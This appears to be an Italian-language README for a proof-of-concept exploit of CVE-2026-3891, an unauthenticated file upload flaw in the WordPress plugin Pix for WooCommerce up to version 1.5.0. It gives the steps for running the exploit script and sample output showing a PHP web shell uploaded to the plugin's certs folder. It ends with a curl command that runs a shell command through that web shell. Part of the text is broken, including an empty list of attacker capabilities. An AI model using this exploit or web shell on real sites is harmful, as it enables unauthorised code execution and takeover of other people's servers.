
PoC per CVE-2026-3891 — Caricamento arbitrario di file non autenticato che porta all'esecuzione remota di codice in Pix for WooCommerce <= 1.5.0
CVE-2026-3891 è una vulnerabilità critica di caricamento arbitrario di file non autenticato trovata nel plugin WordPress Pix for WooCommerce nelle versioni fino alla 1.5.0 inclusa.
La vulnerabilità esiste nella funzionalità lkn_pix_for_woocommerce_c6_save_settings a causa di controlli di autorizzazione mancanti e validazione insufficiente del tipo di file. L'exploit automatizza il processo di ottenimento di un nonce valido e dimostra il caricamento senza restrizioni di un file PHP in una directory accessibile dal web.
Sfruttando questa vulnerabilità, un attaccante non autenticato potrebbe essere in grado di:
pip install requests
CVE-2026-3891.py sul tuo sistema.python CVE-2026-3891.py
Enter the target WordPress URL when prompted:
[?] Enter target URL: http://localhost/wordpress
Example:
[*] Requesting nonce...
[+] Nonce obtained: **********
[*] Uploading woocommerce.php...
[+] File uploaded successfully!
[+] URL: http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php
curl http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php?cmd=ls
